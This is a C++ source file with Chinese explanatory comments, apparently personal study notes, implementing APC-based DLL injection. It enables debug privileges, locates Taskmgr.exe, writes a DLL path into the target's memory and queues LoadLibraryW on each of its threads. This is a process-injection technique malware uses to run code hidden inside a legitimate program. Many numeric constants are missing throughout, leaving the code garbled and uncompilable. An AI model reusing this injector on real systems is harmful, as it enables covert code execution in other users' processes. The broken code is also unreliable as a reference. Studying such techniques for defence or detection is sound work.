// InjectAPC.cpp : 定义控制台应用程序的入口点。
// #include "stdafx.h"
#include <Windows.h>
#include <iostream>
#include <vector>
#include <TlHelp32.h> using namespace std;
BOOL GrantPrivileges(WCHAR* PrivilegeName);
BOOL GetProcessIDByProcessImageName(IN WCHAR* wzProcessImageName, OUT UINT32* TargetProcessID);
BOOL GetThreadIDByProcessID(UINT32 ProcessID, vector<UINT32>& ThreadIDVector);
BOOL Inject(UINT32 ProcessID, UINT32 ThreadID); WCHAR DllFullPath[MAX_PATH] = { };
PVOID DllFullPathBufferData = NULL; int main()
{
if(GrantPrivileges(SE_DEBUG_NAME)==FALSE)
{
printf("GrantPrivilege Error\r\n");
}
UINT32 ProcessID = ;
GetCurrentDirectory(MAX_PATH, DllFullPath);
wcscat(DllFullPath, L"\\Dll.dll");
//getchar();
//printf("%S\r\n", DllFullPath); #ifdef _WIN64
GetProcessIDByProcessImageName(L"Taskmgr.exe", &ProcessID);
// GetProcessIDByProcessImageName(L"explorer.exe", &ProcessID);
#else
GetProcessIDByProcessImageName(L"Taskmgr.exe", &ProcessID);
#endif
vector<UINT32> ThreadIDVector;
//printf("%d\r\n", ProcessID);
GetThreadIDByProcessID(ProcessID, ThreadIDVector); UINT32 ThreadID = ;
while (!ThreadIDVector.empty())
{
ThreadID = ThreadIDVector.back();
Inject(ProcessID, ThreadID);
ThreadIDVector.pop_back();
}
/*size_t ThreadCount = ThreadIDVector.size();
for (INT_PTR i = ThreadCount - 1; i >= 0; i--)
{
UINT32 ThreadID = ThreadIDVector[i];
Inject(ProcessID, ThreadID);
}*/
getchar();
return ;
}
//提高的是自己的权限,提成自己想要的。 BOOL GrantPrivileges(WCHAR* PrivilegeName)
{
HANDLE TokenHandle = NULL;
TOKEN_PRIVILEGES PrivilegesToken;
LUID v1;
//打开权限令牌
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &TokenHandle))
{
return FALSE;
}
if (!LookupPrivilegeValue(NULL, PrivilegeName, &v1))
{
CloseHandle(TokenHandle);
return FALSE;
}
PrivilegesToken.PrivilegeCount = ;
PrivilegesToken.Privileges[].Luid = v1;
PrivilegesToken.Privileges[].Attributes = SE_PRIVILEGE_ENABLED;
//调整权限 //特权启用. 特权被用来访问一个对象或服务
if (!AdjustTokenPrivileges(TokenHandle, FALSE, &PrivilegesToken, sizeof(PrivilegesToken), NULL, NULL))
{
CloseHandle(TokenHandle);
TokenHandle = NULL;
return false;
}
//启用特权
CloseHandle(TokenHandle); return TRUE;
}
//做好放的笔记里
BOOL GetProcessIDByProcessImageName(IN WCHAR * wzProcessImageName, OUT UINT32 * TargetProcessID)
{
HANDLE ProcessSnapshotHandle = NULL; //1.初始化 ProcessSnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, );
//一个班的学生
if (ProcessSnapshotHandle == INVALID_HANDLE_VALUE)
{
return FALSE;
} PROCESSENTRY32 ProcessEntry32 = { }; //用来存放快照进程信息的一个结构体
ProcessEntry32.dwSize = sizeof(PROCESSENTRY32);//初始化PROCESSENTRY结构
Process32First(ProcessSnapshotHandle, &ProcessEntry32); //把第一个进程 放在结构体中 do
{
if (lstrcmpi(ProcessEntry32.szExeFile, wzProcessImageName)==) //不区分大小写
{ //进程的名称
*TargetProcessID = ProcessEntry32.th32ProcessID;
break;
}
} while (Process32Next(ProcessSnapshotHandle, &ProcessEntry32));
//printf("%d\r\n", *TargetProcessID);
CloseHandle(ProcessSnapshotHandle);
ProcessSnapshotHandle = NULL;
return TRUE;
return ;
}
//枚举对方的指定进程ID的所有线程,压入vector中,返回线程集合
BOOL GetThreadIDByProcessID(UINT32 ProcessID, vector<UINT32>& ThreadIDVector)
{
HANDLE ThreadSnapshotHandle = NULL;
THREADENTRY32 ThreadEntry32 = { };
ThreadEntry32.dwSize = sizeof(THREADENTRY32);
ThreadSnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, );
if (ThreadSnapshotHandle == INVALID_HANDLE_VALUE) //指定将要快照的进程ID。如果该参数为0表示快照当前进程。该参数只有在设置了TH32CS_SNAPHEAPLIST或者TH32CS_SNAPMODULE后才有效,
{ //在其他情况下该参数被忽略,所有的进程都会被快照。所以不用修改0为ProcessID。
return FALSE;
}
BOOL bOk = Thread32First(ThreadSnapshotHandle, &ThreadEntry32);
if (bOk)
{
do
{
if (ThreadEntry32.th32OwnerProcessID == ProcessID)
{
ThreadIDVector.emplace_back(ThreadEntry32.th32ThreadID); //怀疑可能push.back枚举可以
}
} while (Thread32Next(ThreadSnapshotHandle, &ThreadEntry32));
}
CloseHandle(ThreadSnapshotHandle);
ThreadSnapshotHandle = NULL;
return TRUE;
} BOOL Inject(UINT32 ProcessID, UINT32 ThreadID)
{
HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessID);
HANDLE ThreadHandle = INVALID_HANDLE_VALUE;
//
SIZE_T ReturnLength = ; size_t DllFullPathLength = wcslen(DllFullPath) + ; if (DllFullPathBufferData == NULL)
{
//在对方进程空间申请内存,存储Dll完整路径。
DllFullPathBufferData = VirtualAllocEx(ProcessHandle, NULL, DllFullPathLength * , MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (DllFullPathBufferData == NULL)
{
CloseHandle(ProcessHandle);
CloseHandle(ThreadHandle);
return FALSE;
}
//将DllFullPath写进刚刚申请的内存中 size是双字长度
BOOL bOk = WriteProcessMemory(ProcessHandle, DllFullPathBufferData, DllFullPath, DllFullPathLength*,
&ReturnLength); if (bOk == FALSE)
{
VirtualFreeEx(ProcessHandle,DllFullPathBufferData,(DllFullPathLength * ), MEM_RELEASE);
CloseHandle(ProcessHandle);
CloseHandle(ThreadHandle);
return FALSE;
}
} UINT_PTR LoadLibraryAddress = (UINT_PTR)GetProcAddress(GetModuleHandle(L"Kernel32.dll"),"LoadLibraryW");
//当前进程中获得导入模块Kernel32基地址
//Kernel32模块中的导出表中获得函数LoadLibraryW /*
为什么这里用导出表中的地址LoadLibraryW不用导入表中的函数地址?
LoadLibraryW 当前进程导入表中的地址 比如 LoadLibraryW = 0x1234 0x1234 -->0x7564 相当于 0x1234[0x7564] 1.防止中一种病毒叫Hook IAT(ImportAddressTable) Hook
中这种病毒,修改了Kernel 地址 0x7564,这样寻不到址
2.确保地址OK */
if (LoadLibraryAddress == NULL)
{
VirtualFreeEx(ProcessHandle, DllFullPathBufferData, (DllFullPathLength * ), MEM_RELEASE);
CloseHandle(ProcessHandle);
return FALSE;
}
_try
{
ThreadHandle = OpenThread(THREAD_ALL_ACCESS, FALSE, ThreadID);
QueueUserAPC((PAPCFUNC)LoadLibraryAddress,ThreadHandle,(UINT_PTR)DllFullPathBufferData);
//LoadLibraryAddress(DllFullPathBufferData)
}
_except(EXCEPTION_CONTINUE_EXECUTION)
{ }
CloseHandle(ProcessHandle);
CloseHandle(ThreadHandle);
return ;
}
卷珠帘